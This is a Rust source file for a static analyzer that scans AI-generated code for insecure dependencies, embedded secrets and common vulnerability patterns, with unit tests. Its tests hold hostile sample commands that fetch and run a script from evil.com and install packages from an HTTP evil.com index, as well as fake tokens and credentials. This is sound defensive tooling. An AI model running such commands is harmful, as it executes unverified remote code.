use thiserror::Error;
use crate::extractor::ExtractedBlock;
use crate::report::{AnalysisSource, VulnCategory, VulnFinding, VulnSeverity};
use crate::scanner;
#[derive(Error, Debug)]
pub enum AnalyzerError {
#[error("Static analysis failed: {0}")]
Static(String),
#[error("LLM review failed: {0}")]
LlmReview(String),
#[error("Sandbox error: {0}")]
Sandbox(String),
#[error("Analyzer disabled or unavailable")]
Disabled,
}
#[allow(async_fn_in_trait)]
pub trait Analyzer: Send + Sync {
fn name(&self) -> &'static str;
async fn is_available(&self) -> bool;
async fn analyze(
&self,
ego_output: &str,
code_blocks: &[ExtractedBlock],
) -> Result<Vec<VulnFinding>, AnalyzerError>;
}
pub struct StaticAnalyzer {
_extra_rules: Vec<ShadowRule>,
}
struct ShadowRule {
_id: &'static str,
category: VulnCategory,
severity: VulnSeverity,
pattern: &'static str,
title: &'static str,
description: &'static str,
cwe: Option<u32>,
remediation: &'static str,
}
pub struct DependencyAnalyzer;
impl DependencyAnalyzer {
pub fn new() -> Self {
Self
}
}
impl Default for DependencyAnalyzer {
fn default() -> Self {
Self::new()
}
}
struct DepRule {
pattern: &'static str,
title: &'static str,
description: &'static str,
severity: VulnSeverity,
cwe: Option<u32>,
remediation: &'static str,
}
const DEP_RULES: &[DepRule] = &[
DepRule {
pattern: r#"(pip|pip3)\s+install\s+--index-url\s+http://"#,
title: "Insecure package index (HTTP)",
description: "Installing packages from an unencrypted HTTP source enables MITM attacks.",
severity: VulnSeverity::High,
cwe: Some(829),
remediation: "Always use HTTPS for package indices.",
},
DepRule {
pattern: r#"npm\s+install\s+--ignore-scripts\s+false"#,
title: "NPM install with scripts enabled explicitly",
description:
"Enabling install scripts on untrusted packages risks arbitrary code execution.",
severity: VulnSeverity::Medium,
cwe: Some(829),
remediation: "Audit packages before enabling install scripts.",
},
DepRule {
pattern: r#"(event-stream|ua-parser-js|coa|rc|colors)\b.*\d+\.\d+\.\d+"#,
title: "Previously compromised NPM package",
description:
"This package has a known supply chain attack history. Verify the version is safe.",
severity: VulnSeverity::High,
cwe: Some(506),
remediation: "Pin to a verified safe version and audit the package.",
},
DepRule {
pattern: r#"(urllib3|requests|django|flask|lodash|express)\s*[<>=]+\s*[\d.]+.*\b(0\.\d|1\.[0-5]\.)"#,
title: "Potentially outdated dependency version",
description: "Very old versions of popular packages often contain known vulnerabilities.",
severity: VulnSeverity::Medium,
cwe: Some(1104),
remediation: "Update to the latest stable version.",
},
DepRule {
pattern: r#"curl\s+.*\|\s*(sh|bash|python|node)"#,
title: "Pipe-to-shell installation",
description: "Downloading and executing scripts in one step bypasses all verification.",
severity: VulnSeverity::Critical,
cwe: Some(829),
remediation: "Download first, verify checksum/signature, then execute.",
},
DepRule {
pattern: r#"(git\+http://|git://)[^\s]+"#,
title: "Git dependency over unencrypted protocol",
description: "Git dependencies over HTTP or git:// are vulnerable to MITM.",
severity: VulnSeverity::Medium,
cwe: Some(319),
remediation: "Use HTTPS or SSH for git dependencies.",
},
];
impl Analyzer for DependencyAnalyzer {
fn name(&self) -> &'static str {
"dependency"
}
async fn is_available(&self) -> bool {
true
}
async fn analyze(
&self,
ego_output: &str,
code_blocks: &[ExtractedBlock],
) -> Result<Vec<VulnFinding>, AnalyzerError> {
let mut findings = Vec::new();
let targets: Vec<&str> = std::iter::once(ego_output)
.chain(code_blocks.iter().map(|b| b.content.as_str()))
.collect();
for text in &targets {
for rule in DEP_RULES {
if let Ok(re) = regex::Regex::new(rule.pattern) {
for mat in re.find_iter(text) {
let line_num = text[..mat.start()].matches('\n').count() + 1;
findings.push(VulnFinding {
id: uuid_v4(),
category: VulnCategory::Unknown,
severity: rule.severity,
title: rule.title.to_string(),
description: rule.description.to_string(),
evidence: truncate_evidence(mat.as_str()),
line: Some(line_num),
cwe: rule.cwe,
remediation: rule.remediation.to_string(),
source: AnalysisSource::Static,
});
}
}
}
}
Ok(findings)
}
}
pub struct SecretsAnalyzer;
impl SecretsAnalyzer {
pub fn new() -> Self {
Self
}
}
impl Default for SecretsAnalyzer {
fn default() -> Self {
Self::new()
}
}
struct SecretRule {
pattern: &'static str,
title: &'static str,
severity: VulnSeverity,
remediation: &'static str,
}
const SECRET_RULES: &[SecretRule] = &[
SecretRule {
pattern: r#"ghp_[0-9a-zA-Z]{36}"#,
title: "GitHub personal access token",
severity: VulnSeverity::Critical,
remediation:
"Revoke the token at github.com/settings/tokens and use environment variables.",
},
SecretRule {
pattern: r#"sk-[a-zA-Z0-9]{20}T3BlbkFJ[a-zA-Z0-9]{20}"#,
title: "OpenAI API key",
severity: VulnSeverity::Critical,
remediation: "Rotate the key at platform.openai.com/api-keys.",
},
SecretRule {
pattern: r#"sk-ant-api[a-zA-Z0-9_-]{80,}"#,
title: "Anthropic API key",
severity: VulnSeverity::Critical,
remediation: "Rotate the key at console.anthropic.com/settings/keys.",
},
SecretRule {
pattern: r#"xox[bpoas]-[0-9a-zA-Z-]{10,}"#,
title: "Slack token",
severity: VulnSeverity::Critical,
remediation: "Revoke and regenerate the token in your Slack app settings.",
},
SecretRule {
pattern: r#"(mongodb(\+srv)?://)[^\s"']+:[^\s"']+@"#,
title: "MongoDB connection string with credentials",
severity: VulnSeverity::Critical,
remediation: "Use environment variables for database connection strings.",
},
SecretRule {
pattern: r#"(postgres(ql)?|mysql|mssql)://[^\s"']+:[^\s"']+@"#,
title: "Database connection string with credentials",
severity: VulnSeverity::Critical,
remediation: "Use environment variables for database connection strings.",
},
SecretRule {
pattern: r#"(eyJ[a-zA-Z0-9_-]{20,}\.eyJ[a-zA-Z0-9_-]{20,}\.[a-zA-Z0-9_-]{20,})"#,
title: "JWT token in code",
severity: VulnSeverity::High,
remediation: "Never hardcode JWT tokens. Generate them at runtime.",
},
SecretRule {
pattern: r#"SG\.[a-zA-Z0-9_-]{22}\.[a-zA-Z0-9_-]{43}"#,
title: "SendGrid API key",
severity: VulnSeverity::Critical,
remediation: "Revoke and rotate the key in SendGrid dashboard.",
},
SecretRule {
pattern: r#"sk_live_[0-9a-zA-Z]{24,}"#,
title: "Stripe live secret key",
severity: VulnSeverity::Critical,
remediation: "Rotate immediately at dashboard.stripe.com/apikeys.",
},
SecretRule {
pattern: r#"AIza[0-9A-Za-z_-]{35}"#,
title: "Google API key",
severity: VulnSeverity::High,
remediation: "Restrict or rotate the key in Google Cloud Console.",
},
];
impl Analyzer for SecretsAnalyzer {
fn name(&self) -> &'static str {
"secrets"
}
async fn is_available(&self) -> bool {
true
}
async fn analyze(
&self,
ego_output: &str,
code_blocks: &[ExtractedBlock],
) -> Result<Vec<VulnFinding>, AnalyzerError> {
let mut findings = Vec::new();
let targets: Vec<&str> = std::iter::once(ego_output)
.chain(code_blocks.iter().map(|b| b.content.as_str()))
.collect();
for text in &targets {
for rule in SECRET_RULES {
if let Ok(re) = regex::Regex::new(rule.pattern) {
for mat in re.find_iter(text) {
let line_num = text[..mat.start()].matches('\n').count() + 1;
let evidence = redact_secret(mat.as_str());
findings.push(VulnFinding {
id: uuid_v4(),
category: VulnCategory::HardcodedSecret,
severity: rule.severity,
title: rule.title.to_string(),
description: "Credential or secret found in AI output.".to_string(),
evidence,
line: Some(line_num),
cwe: Some(798),
remediation: rule.remediation.to_string(),
source: AnalysisSource::Static,
});
}
}
}
}
Ok(findings)
}
}
fn redact_secret(s: &str) -> String {
if s.len() <= 10 {
return format!("{}***", &s[..s.len().min(4)]);
}
format!("{}***{}", &s[..8], &s[s.len() - 4..])
}
const SHADOW_RULES: &[ShadowRule] = &[
ShadowRule {
_id: "sqli-string-concat",
category: VulnCategory::SqlInjection,
severity: VulnSeverity::Critical,
pattern: r#"(SELECT|INSERT|UPDATE|DELETE|DROP)\s+.*\+\s*(user|input|param|req\.|request\.|args)"#,
title: "SQL injection via string concatenation",
description: "SQL query built by concatenating user-controlled input.",
cwe: Some(89),
remediation: "Use parameterized queries or an ORM.",
},
ShadowRule {
_id: "sqli-format-string",
category: VulnCategory::SqlInjection,
severity: VulnSeverity::Critical,
pattern: r#"(f"|f'|format!\(|\.format\().*(?:SELECT|INSERT|UPDATE|DELETE|DROP)"#,
title: "SQL injection via format string",
description:
"SQL query constructed using format strings with potentially user-controlled values.",
cwe: Some(89),
remediation: "Use parameterized queries.",
},
ShadowRule {
_id: "hardcoded-password",
category: VulnCategory::HardcodedSecret,
severity: VulnSeverity::High,
pattern: r#"(?i)(password|passwd|secret|api_key|apikey|token|auth)\s*=\s*["'][^"']{8,}["']"#,
title: "Hardcoded secret or credential",
description: "A credential appears to be hardcoded in the source.",
cwe: Some(798),
remediation: "Use environment variables or a secrets manager.",
},
ShadowRule {
_id: "hardcoded-aws-key",
category: VulnCategory::HardcodedSecret,
severity: VulnSeverity::Critical,
pattern: r#"(?:AKIA|ASIA)[0-9A-Z]{16}"#,
title: "AWS access key ID detected",
description: "An AWS access key ID pattern was found in the code.",
cwe: Some(798),
remediation: "Remove the key, rotate it in AWS IAM, use IAM roles.",
},
ShadowRule {
_id: "hardcoded-private-key",
category: VulnCategory::HardcodedSecret,
severity: VulnSeverity::Critical,
pattern: r#"-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"#,
title: "Private key embedded in code",
description: "A private key header was found.",
cwe: Some(321),
remediation: "Remove the key, rotate it, store securely.",
},
ShadowRule {
_id: "path-traversal-user-input",
category: VulnCategory::PathTraversal,
severity: VulnSeverity::High,
pattern: r#"(open|read|write|Path|PathBuf|fs\.|os\.path)\s*\(.*\.\.\/"#,
title: "Potential path traversal",
description: "File operation uses a path containing '../'.",
cwe: Some(22),
remediation: "Canonicalize paths and verify they remain within allowed directories.",
},
ShadowRule {
_id: "xss-innerhtml",
category: VulnCategory::XssReflected,
severity: VulnSeverity::High,
pattern: r#"(innerHTML|outerHTML|document\.write|v-html|dangerouslySetInnerHTML)\s*="#,
title: "Potential XSS via unsafe HTML injection",
description: "Direct HTML injection that may include unsanitized user input.",
cwe: Some(79),
remediation: "Use textContent, sanitize HTML with DOMPurify.",
},
ShadowRule {
_id: "unsafe-deserialize",
category: VulnCategory::InsecureDeserialization,
severity: VulnSeverity::High,
pattern: r#"(pickle\.loads?|yaml\.load\(|yaml\.unsafe_load|Marshal\.load|unserialize)\s*\("#,
title: "Insecure deserialization",
description: "Deserializing untrusted data can lead to RCE.",
cwe: Some(502),
remediation: "Use safe deserialization (yaml.safe_load, JSON).",
},
ShadowRule {
_id: "weak-hash-md5",
category: VulnCategory::CryptoWeakness,
severity: VulnSeverity::Medium,
pattern: r#"(?i)(md5|sha1)\s*[.(]"#,
title: "Weak hash algorithm",
description: "MD5 and SHA-1 are cryptographically broken.",
cwe: Some(328),
remediation: "Use SHA-256 or better.",
},
ShadowRule {
_id: "infinite-loop-risk",
category: VulnCategory::ResourceAbuse,
severity: VulnSeverity::Medium,
pattern: r#"while\s*\(\s*(true|1|True)\s*\)"#,
title: "Potential infinite loop",
description: "Unbounded loop that may consume CPU indefinitely.",
cwe: Some(835),
remediation: "Add a maximum iteration count or timeout.",
},
];
impl StaticAnalyzer {
pub fn new() -> Self {
Self {
_extra_rules: Vec::new(),
}
}
}
impl Default for StaticAnalyzer {
fn default() -> Self {
Self::new()
}
}
impl Analyzer for StaticAnalyzer {
fn name(&self) -> &'static str {
"static"
}
async fn is_available(&self) -> bool {
true
}
async fn analyze(
&self,
ego_output: &str,
code_blocks: &[ExtractedBlock],
) -> Result<Vec<VulnFinding>, AnalyzerError> {
let mut findings = Vec::new();
for block in code_blocks {
let filename = format!("output.{}", block.language.as_deref().unwrap_or("txt"));
let scan_findings = scanner::scan_content(&filename, &block.content);
for sf in scan_findings {
findings.push(VulnFinding {
id: uuid_v4(),
category: map_scanner_category(&sf.rule_id),
severity: map_scanner_severity(sf.severity),
title: sf.message.clone(),
description: sf.message,
evidence: sf.evidence,
line: Some(sf.line),
cwe: None,
remediation: "Review and fix the flagged pattern.".to_string(),
source: AnalysisSource::Static,
});
}
}
let targets: Vec<(&str, &str)> = std::iter::once(("output", ego_output))
.chain(code_blocks.iter().map(|b| {
let lang = b.language.as_deref().unwrap_or("code");
(lang, b.content.as_str())
}))
.collect();
for (source_name, text) in &targets {
for rule in SHADOW_RULES {
if let Ok(re) = regex::Regex::new(rule.pattern) {
for mat in re.find_iter(text) {
let line_num = text[..mat.start()].matches('\n').count() + 1;
let evidence = truncate_evidence(mat.as_str());
findings.push(VulnFinding {
id: uuid_v4(),
category: rule.category,
severity: rule.severity,
title: rule.title.to_string(),
description: format!("[{}] {}", source_name, rule.description),
evidence,
line: Some(line_num),
cwe: rule.cwe,
remediation: rule.remediation.to_string(),
source: AnalysisSource::Static,
});
}
}
}
}
findings.sort_by(|a, b| {
a.category
.to_string()
.cmp(&b.category.to_string())
.then(a.evidence.cmp(&b.evidence))
});
findings.dedup_by(|a, b| a.category == b.category && a.evidence == b.evidence);
Ok(findings)
}
}
fn map_scanner_severity(sev: scanner::Severity) -> VulnSeverity {
match sev {
scanner::Severity::Info => VulnSeverity::Low,
scanner::Severity::Warn => VulnSeverity::Medium,
scanner::Severity::Critical => VulnSeverity::High,
}
}
fn map_scanner_category(rule_id: &str) -> VulnCategory {
if rule_id.contains("eval") || rule_id.contains("exec") || rule_id.contains("spawn") {
VulnCategory::CommandInjection
} else if rule_id.contains("keychain")
|| rule_id.contains("ssh")
|| rule_id.contains("password")
{
VulnCategory::HardcodedSecret
} else if rule_id.contains("reverse-shell") || rule_id.contains("crypto-mining") {
VulnCategory::DataExfiltration
} else if rule_id.contains("sudo") || rule_id.contains("chmod") {
VulnCategory::PrivilegeEscalation
} else if rule_id.contains("curl") || rule_id.contains("webhook") || rule_id.contains("dns") {
VulnCategory::DataExfiltration
} else if rule_id.contains("base64") || rule_id.contains("hex") || rule_id.contains("char-code")
{
VulnCategory::CommandInjection
} else {
VulnCategory::Unknown
}
}
fn truncate_evidence(s: &str) -> String {
let trimmed = s.trim();
if trimmed.len() > 150 {
format!("{}...", &trimmed[..150])
} else {
trimmed.to_string()
}
}
fn uuid_v4() -> String {
use std::sync::atomic::{AtomicU64, Ordering};
static COUNTER: AtomicU64 = AtomicU64::new(0);
let ts = std::time::SystemTime::now()
.duration_since(std::time::UNIX_EPOCH)
.unwrap_or_default()
.as_nanos();
let count = COUNTER.fetch_add(1, Ordering::Relaxed);
format!("shd-{:x}-{:04x}", ts, count)
}
#[cfg(test)]
mod tests {
use super::*;
fn make_block(lang: &str, content: &str) -> ExtractedBlock {
ExtractedBlock {
language: Some(lang.to_string()),
content: content.to_string(),
char_offset: 0,
}
}
#[tokio::test]
async fn test_detects_sql_injection() {
let analyzer = StaticAnalyzer::new();
let blocks = vec![make_block(
"python",
r#"query = "SELECT * FROM users WHERE id = " + user_input"#,
)];
let findings = analyzer.analyze("", &blocks).await.unwrap();
assert!(findings
.iter()
.any(|f| f.category == VulnCategory::SqlInjection));
}
#[tokio::test]
async fn test_detects_hardcoded_password() {
let analyzer = StaticAnalyzer::new();
let blocks = vec![make_block(
"python",
r#"password = "supersecretpassword123""#,
)];
let findings = analyzer.analyze("", &blocks).await.unwrap();
assert!(findings
.iter()
.any(|f| f.category == VulnCategory::HardcodedSecret));
}
#[tokio::test]
async fn test_clean_code() {
let analyzer = StaticAnalyzer::new();
let blocks = vec![make_block(
"rust",
"fn greet() -> String { \"hello\".to_string() }",
)];
let findings = analyzer.analyze("", &blocks).await.unwrap();
assert!(findings.is_empty());
}
#[tokio::test]
async fn test_detects_xss() {
let analyzer = StaticAnalyzer::new();
let blocks = vec![make_block("js", "element.innerHTML = userInput;")];
let findings = analyzer.analyze("", &blocks).await.unwrap();
assert!(findings
.iter()
.any(|f| f.category == VulnCategory::XssReflected));
}
#[tokio::test]
async fn test_detects_eval_via_scanner() {
let analyzer = StaticAnalyzer::new();
let blocks = vec![make_block("js", "eval(userInput);")];
let findings = analyzer.analyze("", &blocks).await.unwrap();
assert!(!findings.is_empty());
}
#[tokio::test]
async fn test_dep_detects_pipe_to_shell() {
let analyzer = DependencyAnalyzer::new();
let blocks = vec![make_block("sh", "curl https://evil.com/setup.sh | bash")];
let findings = analyzer.analyze("", &blocks).await.unwrap();
assert!(findings.iter().any(|f| f.title.contains("Pipe-to-shell")));
}
#[tokio::test]
async fn test_dep_detects_insecure_index() {
let analyzer = DependencyAnalyzer::new();
let blocks = vec![make_block(
"sh",
"pip install --index-url http://evil.com/simple package",
)];
let findings = analyzer.analyze("", &blocks).await.unwrap();
assert!(findings
.iter()
.any(|f| f.title.contains("Insecure package index")));
}
#[tokio::test]
async fn test_dep_clean() {
let analyzer = DependencyAnalyzer::new();
let blocks = vec![make_block("sh", "pip install requests")];
let findings = analyzer.analyze("", &blocks).await.unwrap();
assert!(findings.is_empty());
}
#[tokio::test]
async fn test_secrets_detects_github_token() {
let analyzer = SecretsAnalyzer::new();
let blocks = vec![make_block(
"py",
"token = \"ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdef1234\"",
)];
let findings = analyzer.analyze("", &blocks).await.unwrap();
assert!(findings.iter().any(|f| f.title.contains("GitHub")));
assert!(findings[0].evidence.contains("***"));
}
#[tokio::test]
async fn test_secrets_detects_stripe_key() {
let analyzer = SecretsAnalyzer::new();
let key = format!("sk_live_{}", "5".repeat(24));
let code = format!("const key = \"{key}\"");
let blocks = vec![make_block("js", &code)];
let findings = analyzer.analyze("", &blocks).await.unwrap();
assert!(findings.iter().any(|f| f.title.contains("Stripe")));
}
#[tokio::test]
async fn test_secrets_detects_db_connection() {
let analyzer = SecretsAnalyzer::new();
let blocks = vec![make_block(
"py",
"db = \"postgresql://admin:password123@prod.db.com:5432/main\"",
)];
let findings = analyzer.analyze("", &blocks).await.unwrap();
assert!(findings
.iter()
.any(|f| f.title.contains("Database connection")));
}
#[tokio::test]
async fn test_secrets_clean() {
let analyzer = SecretsAnalyzer::new();
let blocks = vec![make_block("py", "x = os.environ['API_KEY']")];
let findings = analyzer.analyze("", &blocks).await.unwrap();
assert!(findings.is_empty());
}
#[test]
fn test_redact_secret() {
assert_eq!(
redact_secret("ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZab"),
"ghp_ABCD***YZab"
);
assert_eq!(redact_secret("short"), "shor***");
}
}